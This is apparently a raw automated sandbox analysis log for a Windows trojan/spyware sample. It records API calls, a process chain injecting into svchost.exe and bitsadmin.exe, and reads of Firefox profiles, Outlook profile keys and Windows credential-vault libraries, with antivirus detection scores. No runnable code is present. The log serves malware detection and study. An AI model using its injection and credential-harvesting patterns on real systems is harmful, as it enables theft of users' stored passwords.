Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372EA0 NtAdjustPrivilegesToken,	1_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372E80 NtReadVirtualMemory,	1_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372EE0 NtQueueApcThread,	1_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372D30 NtUnmapViewOfSection,	1_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372D10 NtMapViewOfSection,	1_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372D00 NtSetInformationFile,	1_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372DB0 NtEnumerateKey,	1_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372DD0 NtDelayExecution,	1_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372C00 NtQueryInformationProcess,	1_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372C70 NtFreeVirtualMemory,	1_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372C60 NtCreateKey,	1_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372CA0 NtQueryInformationToken,	1_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372CF0 NtOpenProcess,	1_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372CC0 NtQueryVirtualMemory,	1_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03373010 NtOpenDirectoryObject,	1_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03373090 NtSetValueKey,	1_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033739B0 NtGetContextThread,	1_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03373D10 NtOpenProcessToken,	1_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03373D70 NtOpenThread,	1_2_03373D70

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00B740B1

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B68858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B68858

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B7545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B7545F

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B1E800	0_2_00B1E800
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3DBB5	0_2_00B3DBB5
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B1FE40	0_2_00B1FE40
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B1E060	0_2_00B1E060
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B9804A	0_2_00B9804A
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B24140	0_2_00B24140
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B32405	0_2_00B32405
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B46522	0_2_00B46522
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B4267E	0_2_00B4267E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B90665	0_2_00B90665
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3283A	0_2_00B3283A
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B26843	0_2_00B26843
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B489DF	0_2_00B489DF
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B46A94	0_2_00B46A94
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B90AE2	0_2_00B90AE2
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B28A0E	0_2_00B28A0E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B78B13	0_2_00B78B13
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B6EB07	0_2_00B6EB07
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3CD61	0_2_00B3CD61
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B47006	0_2_00B47006
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B23190	0_2_00B23190
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B2710E	0_2_00B2710E
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B11287	0_2_00B11287
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B333C7	0_2_00B333C7
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3F419	0_2_00B3F419
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B25680	0_2_00B25680
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B316C4	0_2_00B316C4
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B378D3	0_2_00B378D3
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B258C0	0_2_00B258C0
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B31BB8	0_2_00B31BB8
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B49D05	0_2_00B49D05
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B3BFE6	0_2_00B3BFE6
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B31FD0	0_2_00B31FD0
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_01E93600	0_2_01E93600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418943	1_2_00418943
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402140	1_2_00402140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040213D	1_2_0040213D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004101A3	1_2_004101A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F263	1_2_0042F263
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402A20	1_2_00402A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404287	1_2_00404287
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416B43	1_2_00416B43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402328	1_2_00402328
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402330	1_2_00402330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416B3E	1_2_00416B3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004103C3	1_2_004103C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00404385	1_2_00404385
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E3B3	1_2_0040E3B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E4F8	1_2_0040E4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E54C	1_2_0040E54C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E503	1_2_0040E503
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F60	1_2_00402F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FA352	1_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034003E6	1_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E3F0	1_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274	1_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C02C0	1_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118	1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330100	1_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C8158	1_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034001AA	1_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F81CC	1_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03364750	1_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333C7C0	1_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335C6E0	1_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03400591	1_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E4420	1_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F2446	1_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EE4F6	1_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FAB40	1_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F6BD7	1_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333EA80	1_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03356962	1_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033429A0	1_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340A9A6	1_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334A840	1_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03342840	1_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033268B8	1_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E8F0	1_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360F30	1_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E2F30	1_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03382F28	1_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B4F40	1_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BEFA0	1_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332FC8	1_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FEE26	1_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340E59	1_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03352E90	1_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FCE93	1_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FEEDB	1_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DCD1F	1_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334AD00	1_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03358DBF	1_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333ADE0	1_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340C00	1_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0CB5	1_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330CF2	1_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F132D	1_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332D34C	1_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0338739A	1_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033452A0	1_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335D2F0	1_2_0335D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E12ED	1_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335B2C0	1_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340B16B	1_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332F172	1_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337516C	1_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334B1B0	1_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F70E9	1_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FF0E0	1_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EF0CC	1_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033470C0	1_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FF7B0	1_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F16CC	1_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DD5B0	1_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FF43F	1_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03331460	1_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FFB76	1_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335FB80	1_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B5BF0	1_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337DBF9	1_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B3A6C	1_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FFA49	1_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F7A46	1_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DDAAC	1_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03385AA0	1_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E1AA3	1_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EDAC6	1_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D5910	1_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03349950	1_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335B950	1_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AD800	1_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FFF09	1_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FFFB1	1_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03341F92	1_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03349EB0	1_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F7D73	1_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F1D5A	1_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03343D40	1_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335FDC0	1_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B9C32	1_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FFCF2	1_2_033FFCF2

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 260 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 99 times
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: String function: 00B38B40 appears 42 times
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: String function: 00B17F41 appears 35 times
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: String function: 00B30D27 appears 70 times

Source: WyGagXWAfb.exe, 00000000.00000003.1699489104.0000000003C83000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WyGagXWAfb.exe
Source: WyGagXWAfb.exe, 00000000.00000003.1699715322.0000000003E2D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WyGagXWAfb.exe

Source: WyGagXWAfb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/4

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B7A2D5 GetLastError,FormatMessageW,

0_2_00B7A2D5

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B68713 AdjustTokenPrivileges,CloseHandle,		0_2_00B68713
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: 0_2_00B68CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00B68CC3

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B7B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B7B59E

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B8F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B8F121

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B886D0

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B14FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00B14FE9

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

File created: C:\Users\user\AppData\Local\Temp\autAA6A.tmp

Jump to behavior

Source: WyGagXWAfb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bitsadmin.exe, 00000006.00000002.2924787336.0000000000713000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000003.2439900966.0000000000713000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WyGagXWAfb.exe	Virustotal: Detection: 63%
Source: WyGagXWAfb.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\WyGagXWAfb.exe "C:\Users\user\Desktop\WyGagXWAfb.exe"
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WyGagXWAfb.exe"
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WyGagXWAfb.exe"	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: WyGagXWAfb.exe

Static file information: File size 1210368 > 1048576

Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WyGagXWAfb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: WyGagXWAfb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bmHwSvjHTinzr.exe, 00000005.00000000.2173688723.000000000031E000.00000002.00000001.01000000.00000005.sdmp
